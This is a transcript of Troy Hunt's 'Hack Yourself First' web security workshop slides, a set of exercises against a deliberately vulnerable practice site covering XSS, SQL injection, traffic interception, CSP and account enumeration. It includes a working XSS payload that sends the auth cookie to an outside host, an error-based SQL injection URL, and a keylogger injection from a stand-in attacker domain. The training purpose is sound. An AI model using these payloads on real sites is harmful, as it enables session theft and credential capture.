Hack Yourself First Troy Hunt @troyhunt troyhunt.com [email protected].
-
Upload
ashlyn-woods -
Category
Documents
-
view
226 -
download
0
Transcript of Hack Yourself First Troy Hunt @troyhunt troyhunt.com [email protected].
![Page 2: Hack Yourself First Troy Hunt @troyhunt troyhunt.com troyhunt@hotmail.com.](https://reader035.fdocuments.in/reader035/viewer/2022062309/5697c0281a28abf838cd69a4/html5/thumbnails/2.jpg)
We’re gonna turn you into lean, mean
hacking machines!
![Page 3: Hack Yourself First Troy Hunt @troyhunt troyhunt.com troyhunt@hotmail.com.](https://reader035.fdocuments.in/reader035/viewer/2022062309/5697c0281a28abf838cd69a4/html5/thumbnails/3.jpg)
Because if we don’t, these kidsare going to hack you
Ryan Cleary, 20(and his mum)
Jake Davies, 19(and his mum)
Curtis Gervais, 16, awaiting trial(probably with his mum)
![Page 4: Hack Yourself First Troy Hunt @troyhunt troyhunt.com troyhunt@hotmail.com.](https://reader035.fdocuments.in/reader035/viewer/2022062309/5697c0281a28abf838cd69a4/html5/thumbnails/4.jpg)
Who are we protecting our assets from?
Hacker Competency
Hacker Resources
Bored kids
Pocket money
Super Hackers
$10.8Bper
annum
Common Thieves
Can invest where ROI
makes sense
![Page 5: Hack Yourself First Troy Hunt @troyhunt troyhunt.com troyhunt@hotmail.com.](https://reader035.fdocuments.in/reader035/viewer/2022062309/5697c0281a28abf838cd69a4/html5/thumbnails/5.jpg)
Your Hacker Tools for Today
• A Wi-Fi connection• A mobile device you can configure a proxy on
– I have a few spares
• Google Chrome– Or another browser with good dev tools
• Fiddler – getfiddler.com– Or another HTTP proxy like charlesproxy.com
![Page 6: Hack Yourself First Troy Hunt @troyhunt troyhunt.com troyhunt@hotmail.com.](https://reader035.fdocuments.in/reader035/viewer/2022062309/5697c0281a28abf838cd69a4/html5/thumbnails/6.jpg)
What we’ll be covering on day 1Introduction – 30 mins 09:00Discovering risks via the browser – 30 mins
09:30
Using an HTTP proxy – 30 mins 10:00
Break – 15 mins 10:30
XSS – 50 mins 10:45
SQL injection part 1 – 55 mins 11:35
Lunch – 1 hour 12:30
Mobile APIs – 60 mins 13:30
Content Security Policy – 50 mins 14:30
Break – 15 mins 15:20
Account Enumeration – 30 mins 15:35
HTTPS – 55 mins 16:05
Close 17:00
![Page 7: Hack Yourself First Troy Hunt @troyhunt troyhunt.com troyhunt@hotmail.com.](https://reader035.fdocuments.in/reader035/viewer/2022062309/5697c0281a28abf838cd69a4/html5/thumbnails/7.jpg)
Discovering risks via the browser
Exercise 1
![Page 8: Hack Yourself First Troy Hunt @troyhunt troyhunt.com troyhunt@hotmail.com.](https://reader035.fdocuments.in/reader035/viewer/2022062309/5697c0281a28abf838cd69a4/html5/thumbnails/8.jpg)
Exercise 1 – Chrome developer tools
• Familiarise yourself with the dev tools– Elements, network, cookies, console, por… uh,
incognito
• Create an account at hackyourselffirst.troyhunt.comHacker Challenge 1:
Identify three security risks with the registration process
![Page 9: Hack Yourself First Troy Hunt @troyhunt troyhunt.com troyhunt@hotmail.com.](https://reader035.fdocuments.in/reader035/viewer/2022062309/5697c0281a28abf838cd69a4/html5/thumbnails/9.jpg)
Using an HTTP proxyExercise 2
![Page 10: Hack Yourself First Troy Hunt @troyhunt troyhunt.com troyhunt@hotmail.com.](https://reader035.fdocuments.in/reader035/viewer/2022062309/5697c0281a28abf838cd69a4/html5/thumbnails/10.jpg)
Exercise 2 – Using an HTTP proxy
• Familiarise yourself with Fiddler– Watch requests and their headers, review
response body and headers, use the composer to reissue request
Hacker Challenge 2:Use Fiddler to vote multiple times on 1 car with your ID
![Page 11: Hack Yourself First Troy Hunt @troyhunt troyhunt.com troyhunt@hotmail.com.](https://reader035.fdocuments.in/reader035/viewer/2022062309/5697c0281a28abf838cd69a4/html5/thumbnails/11.jpg)
Reflected cross site scripting (XSS)
Exercise 3
![Page 12: Hack Yourself First Troy Hunt @troyhunt troyhunt.com troyhunt@hotmail.com.](https://reader035.fdocuments.in/reader035/viewer/2022062309/5697c0281a28abf838cd69a4/html5/thumbnails/12.jpg)
Understanding XSS
mysite.com/?q=<script>alert('Yay XSS!');</script>
<p>You searched for <%= Request.QueryString["q"] %></p>
<p>You searched for <script>alert('Yay XSS!');</script></p>
mysite.com/?q=ferrari
<p>You searched for ferrari</p>
![Page 13: Hack Yourself First Troy Hunt @troyhunt troyhunt.com troyhunt@hotmail.com.](https://reader035.fdocuments.in/reader035/viewer/2022062309/5697c0281a28abf838cd69a4/html5/thumbnails/13.jpg)
Some quick XSS tips
• Check the encoding context– You encode for HTML differently than for
JavaScript
• Check the encoding consistency– Often it’s manual and some characters are not
encoded
• Play with JavaScript to:– Manipulate the DOM, access cookies, load
external resources
![Page 14: Hack Yourself First Troy Hunt @troyhunt troyhunt.com troyhunt@hotmail.com.](https://reader035.fdocuments.in/reader035/viewer/2022062309/5697c0281a28abf838cd69a4/html5/thumbnails/14.jpg)
Exercise 3 – XSS
• Establish the encoding practices on the search page– What’s encoded, what’s not, what contexts are
encoding
• What can be accessed or manipulated in the DOM
Hacker Challenge 3:Create an XSS attack that sends the auth cookie to another site
![Page 15: Hack Yourself First Troy Hunt @troyhunt troyhunt.com troyhunt@hotmail.com.](https://reader035.fdocuments.in/reader035/viewer/2022062309/5697c0281a28abf838cd69a4/html5/thumbnails/15.jpg)
Exercise 3 solution
http://hackyourselffirst.troyhunt.com/Search?searchTerm=');document.location='http://www.troyhunt.com/?
c='%2bdocument.cookie;//
![Page 16: Hack Yourself First Troy Hunt @troyhunt troyhunt.com troyhunt@hotmail.com.](https://reader035.fdocuments.in/reader035/viewer/2022062309/5697c0281a28abf838cd69a4/html5/thumbnails/16.jpg)
SQL injection (SQLi)Exercise 4
![Page 17: Hack Yourself First Troy Hunt @troyhunt troyhunt.com troyhunt@hotmail.com.](https://reader035.fdocuments.in/reader035/viewer/2022062309/5697c0281a28abf838cd69a4/html5/thumbnails/17.jpg)
Understanding SQLi
mysite.com/?id=foo
var query = "SELECT * FROM Widget WHERE Id = "query += Request.Query["id"]
SELECT * FROM Widget WHERE Id = foo
mysite.com/?id=1
SELECT * FROM Widget WHERE Id = 1
Invalid column name 'foo'
![Page 18: Hack Yourself First Troy Hunt @troyhunt troyhunt.com troyhunt@hotmail.com.](https://reader035.fdocuments.in/reader035/viewer/2022062309/5697c0281a28abf838cd69a4/html5/thumbnails/18.jpg)
Some quick SQLi tips
• Think of SQL commands which disclose structure– sys.tables, sys.columns, system commands
• Consider how you’d enumerate through records– Select top x rows asc then top 1 rows from that
desc
• Write out how you think the query works internally– SELECT * FROM Supercar ORDER BY [URL
param]
![Page 19: Hack Yourself First Troy Hunt @troyhunt troyhunt.com troyhunt@hotmail.com.](https://reader035.fdocuments.in/reader035/viewer/2022062309/5697c0281a28abf838cd69a4/html5/thumbnails/19.jpg)
Exercise 4 – SQLi
• Explore the database using error-based SQLi– Construct strings to disclose internal data– Cast things to invalid types to disclose via
exceptionsHacker Challenge 4:Discover the version of the DB
![Page 20: Hack Yourself First Troy Hunt @troyhunt troyhunt.com troyhunt@hotmail.com.](https://reader035.fdocuments.in/reader035/viewer/2022062309/5697c0281a28abf838cd69a4/html5/thumbnails/20.jpg)
Exercise 4 solution
http://hackyourselffirst.troyhunt.com/Make/1?orderby=@@VERSION*1
![Page 21: Hack Yourself First Troy Hunt @troyhunt troyhunt.com troyhunt@hotmail.com.](https://reader035.fdocuments.in/reader035/viewer/2022062309/5697c0281a28abf838cd69a4/html5/thumbnails/21.jpg)
Mobile APIsExercise 5
![Page 22: Hack Yourself First Troy Hunt @troyhunt troyhunt.com troyhunt@hotmail.com.](https://reader035.fdocuments.in/reader035/viewer/2022062309/5697c0281a28abf838cd69a4/html5/thumbnails/22.jpg)
Understanding mobile APIs
![Page 23: Hack Yourself First Troy Hunt @troyhunt troyhunt.com troyhunt@hotmail.com.](https://reader035.fdocuments.in/reader035/viewer/2022062309/5697c0281a28abf838cd69a4/html5/thumbnails/23.jpg)
Who are we protecting our APIs from?
Attacker
Attacker
HTTP(S)
![Page 24: Hack Yourself First Troy Hunt @troyhunt troyhunt.com troyhunt@hotmail.com.](https://reader035.fdocuments.in/reader035/viewer/2022062309/5697c0281a28abf838cd69a4/html5/thumbnails/24.jpg)
![Page 25: Hack Yourself First Troy Hunt @troyhunt troyhunt.com troyhunt@hotmail.com.](https://reader035.fdocuments.in/reader035/viewer/2022062309/5697c0281a28abf838cd69a4/html5/thumbnails/25.jpg)
Trusting the Fiddler root cert
http://ipv4.fiddler:8888
![Page 26: Hack Yourself First Troy Hunt @troyhunt troyhunt.com troyhunt@hotmail.com.](https://reader035.fdocuments.in/reader035/viewer/2022062309/5697c0281a28abf838cd69a4/html5/thumbnails/26.jpg)
Some quick mobile API tips
• Look at the HTTP requests for sensitive data– Credentials, account info, PII
• Remove the proxy’s root cert and make HTTPS requests– Is cert validation actually enabled in the app?
• In your own apps:– Parameter tampering, auth bypass, direct object
refs
![Page 27: Hack Yourself First Troy Hunt @troyhunt troyhunt.com troyhunt@hotmail.com.](https://reader035.fdocuments.in/reader035/viewer/2022062309/5697c0281a28abf838cd69a4/html5/thumbnails/27.jpg)
Exercise 5 – Mobile APIs
• Proxy your device through Fiddler or Charles– Inspect the traffic of your apps– Perform normal activities and monitor requests
Hacker Challenge 5:Find three “things of interest” – doesn’t have to be security related
![Page 28: Hack Yourself First Troy Hunt @troyhunt troyhunt.com troyhunt@hotmail.com.](https://reader035.fdocuments.in/reader035/viewer/2022062309/5697c0281a28abf838cd69a4/html5/thumbnails/28.jpg)
FiddlerScriptExercise 6
![Page 29: Hack Yourself First Troy Hunt @troyhunt troyhunt.com troyhunt@hotmail.com.](https://reader035.fdocuments.in/reader035/viewer/2022062309/5697c0281a28abf838cd69a4/html5/thumbnails/29.jpg)
Understanding FiddlerScript
• Highlight particular request / response patterns
• Modify requests or responses in transit• Good representation of what can be done
with intercepted traffic• Also great for causing apps to
“misbehave”!
![Page 30: Hack Yourself First Troy Hunt @troyhunt troyhunt.com troyhunt@hotmail.com.](https://reader035.fdocuments.in/reader035/viewer/2022062309/5697c0281a28abf838cd69a4/html5/thumbnails/30.jpg)
Some quick FiddlerScript tips
• Make good use of the FiddlerScript CookBook– Google it – first result
• Wrap conditions around response parsing for better perf– Host name / path / content type / method
• Don’t forget to hit the “Save Script” button!– Plus debugging can be painful…
![Page 31: Hack Yourself First Troy Hunt @troyhunt troyhunt.com troyhunt@hotmail.com.](https://reader035.fdocuments.in/reader035/viewer/2022062309/5697c0281a28abf838cd69a4/html5/thumbnails/31.jpg)
Exercise 6 – FiddlerScript
• Modify the traffic returned to your app– Identify request / response patterns of an app– Manipulate request / response to cause
misbehaviour
Hacker Challenge 6:Proxy your mobile device and cause one of your apps to do something… “interesting”
![Page 32: Hack Yourself First Troy Hunt @troyhunt troyhunt.com troyhunt@hotmail.com.](https://reader035.fdocuments.in/reader035/viewer/2022062309/5697c0281a28abf838cd69a4/html5/thumbnails/32.jpg)
Content Security Policy (CSP)Exercise 7
![Page 33: Hack Yourself First Troy Hunt @troyhunt troyhunt.com troyhunt@hotmail.com.](https://reader035.fdocuments.in/reader035/viewer/2022062309/5697c0281a28abf838cd69a4/html5/thumbnails/33.jpg)
Without a CSP
• Anything can be added to the page via a reflected XSS risk
• Anything can be added to the DOM downstream of the server– …and you have no idea when this one is
happening!
![Page 34: Hack Yourself First Troy Hunt @troyhunt troyhunt.com troyhunt@hotmail.com.](https://reader035.fdocuments.in/reader035/viewer/2022062309/5697c0281a28abf838cd69a4/html5/thumbnails/34.jpg)
With a CSP
• The browser will only load resources you white-list– Local resources– Remote resources
• Any violations can be reported– If you’re nervous, you always just report and
not block
![Page 35: Hack Yourself First Troy Hunt @troyhunt troyhunt.com troyhunt@hotmail.com.](https://reader035.fdocuments.in/reader035/viewer/2022062309/5697c0281a28abf838cd69a4/html5/thumbnails/35.jpg)
Some quick CSP tips
• Create a white list of what should be allowed to run
• Start with nothing and see what breaks– In development!
• Use the report feature to track exceptions– You’ll learn some interesting things…
![Page 36: Hack Yourself First Troy Hunt @troyhunt troyhunt.com troyhunt@hotmail.com.](https://reader035.fdocuments.in/reader035/viewer/2022062309/5697c0281a28abf838cd69a4/html5/thumbnails/36.jpg)
Exercise 7 – CSP
• Falafel needs help!– They have no CSP and they’re a financial
institution!– We can add one ourselves in transit
Hacker Challenge 7:Write a CSP for a site and embed it using FiddlerScript
![Page 37: Hack Yourself First Troy Hunt @troyhunt troyhunt.com troyhunt@hotmail.com.](https://reader035.fdocuments.in/reader035/viewer/2022062309/5697c0281a28abf838cd69a4/html5/thumbnails/37.jpg)
Injecting the CSP header
if (oSession.HostnameIs("www.americanexpress.com")) { oSession.oResponse.headers["Content-Security-Policy"] = …;}
![Page 38: Hack Yourself First Troy Hunt @troyhunt troyhunt.com troyhunt@hotmail.com.](https://reader035.fdocuments.in/reader035/viewer/2022062309/5697c0281a28abf838cd69a4/html5/thumbnails/38.jpg)
HTTPSExercise 8
![Page 39: Hack Yourself First Troy Hunt @troyhunt troyhunt.com troyhunt@hotmail.com.](https://reader035.fdocuments.in/reader035/viewer/2022062309/5697c0281a28abf838cd69a4/html5/thumbnails/39.jpg)
Understanding HTTPS
Confidentiality Integrity Authenticity
![Page 40: Hack Yourself First Troy Hunt @troyhunt troyhunt.com troyhunt@hotmail.com.](https://reader035.fdocuments.in/reader035/viewer/2022062309/5697c0281a28abf838cd69a4/html5/thumbnails/40.jpg)
Some quick HTTPS tips
• Consider everything sent over HTTP to be compromised– Sometimes that won’t matter… much
• Also look at HTTPS content embedded in untrusted pages– Iframes– Links to HTTPS
![Page 41: Hack Yourself First Troy Hunt @troyhunt troyhunt.com troyhunt@hotmail.com.](https://reader035.fdocuments.in/reader035/viewer/2022062309/5697c0281a28abf838cd69a4/html5/thumbnails/41.jpg)
Exercise 8 – HTTPS
• You can’t trust insecure login forms!– The form can be manipulated in transit– Manipulate it to capture the “secure”
credentials in transit
Hacker Challenge 8:Inject a JavaScript keylogger into an insecure login page using Fiddler script
![Page 42: Hack Yourself First Troy Hunt @troyhunt troyhunt.com troyhunt@hotmail.com.](https://reader035.fdocuments.in/reader035/viewer/2022062309/5697c0281a28abf838cd69a4/html5/thumbnails/42.jpg)
Injecting the keylogger
evilcyberhacker.com/keylogger.js
Set the “destination” JavaScript variable
![Page 43: Hack Yourself First Troy Hunt @troyhunt troyhunt.com troyhunt@hotmail.com.](https://reader035.fdocuments.in/reader035/viewer/2022062309/5697c0281a28abf838cd69a4/html5/thumbnails/43.jpg)
Account enumerationExercise 9
![Page 44: Hack Yourself First Troy Hunt @troyhunt troyhunt.com troyhunt@hotmail.com.](https://reader035.fdocuments.in/reader035/viewer/2022062309/5697c0281a28abf838cd69a4/html5/thumbnails/44.jpg)
Understanding account enumeration
Does [email protected] have an account?
No
Does [email protected] have an account?
No
Does [email protected] have an account?
Yes
![Page 45: Hack Yourself First Troy Hunt @troyhunt troyhunt.com troyhunt@hotmail.com.](https://reader035.fdocuments.in/reader035/viewer/2022062309/5697c0281a28abf838cd69a4/html5/thumbnails/45.jpg)
Some quick account enumeration tips
• There are usually multiple vectors for identifying the existence of an account
• There may or may not be anti-automation defence– And it may be inconsistent across vectors
• It may or may not even matter…– Very dependent on the nature
![Page 46: Hack Yourself First Troy Hunt @troyhunt troyhunt.com troyhunt@hotmail.com.](https://reader035.fdocuments.in/reader035/viewer/2022062309/5697c0281a28abf838cd69a4/html5/thumbnails/46.jpg)
Exercise 9 – Account enumeration
• Identify vectors for account enumeration– Think about how to “ask” the site about an
account– Identify positive versus negative responses
Hacker Challenge 9:Identify 3 sites you use that disclose the presence of your account